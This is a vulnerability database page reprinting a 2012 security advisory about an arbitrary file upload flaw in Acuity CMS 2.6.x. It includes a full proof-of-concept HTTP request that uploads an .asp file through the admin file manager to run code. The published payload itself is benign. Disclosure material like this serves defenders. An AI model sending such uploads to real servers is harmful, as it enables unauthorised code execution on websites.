Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Acuity CMS 2.6.x Shell Upload

🗓️ 20 May 2012 00:00:00Reported by Aung KhantType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 14 Views

Acuity CMS 2.6.x ASP-based version allows arbitrary file upload leading to ASP(.Net) code execution. CMS no longer in development, switch to another supported CMS

Code
`1. OVERVIEW  
  
Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.  
  
  
2. BACKGROUND  
  
Acuity CMS is a powerful but simple, extremely easy to use, low  
priced, easy to deploy content management system. It is a leader in  
its price and feature class.  
  
  
3. VULNERABILITY DESCRIPTION  
  
Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an  
attacker to upload .asp/.aspx files without restrictions, which will  
execute ASP(.Net) codes. The issue is due to the script,  
/admin/file_manager/file_upload_submit.asp , not properly sanitizing  
'file1', 'file2', 'file3', 'fileX' parameters.  
  
  
4. VERSIONS AFFECTED  
  
Tested with version 2.6.2.  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
[REQUEST]  
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1  
Host: localhost  
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX  
  
-----------------------------6dc3a236402e2  
Content-Disposition: form-data; name="path"  
  
/images  
-----------------------------6dc3a236402e2  
Content-Disposition: form-data; name="rootpath"  
  
/  
-----------------------------6dc3a236402e2  
Content-Disposition: form-data; name="rootdisplay"  
  
http://localhost/  
-----------------------------6dc3a236402e2  
Content-Disposition: form-data; name="status"  
  
confirmed  
-----------------------------6dc3a236402e2  
Content-Disposition: form-data; name="action"  
  
fileUpload  
-----------------------------6dc3a236402e2  
Content-Disposition: form-data; name="file1"; filename="0wned.asp"  
Content-Type: application/octet-stream  
  
<% response.write("0wned!") %>  
  
-----------------------------6dc3a236402e2--  
  
[/REQUEST]  
  
  
6. SOLUTION  
  
The Acunity CMS is no longer in active development.  
It is recommended to user another CMS in active development and support.  
  
  
7. VENDOR  
  
The Collective  
http://www.thecollective.com.au/  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2012-05-20: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload  
  
#yehg [2012-05-20]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 May 2012 00:00Current
arbitrary file uploadasp-basedcode executioncmsdevelopmentsecurity disclosure
14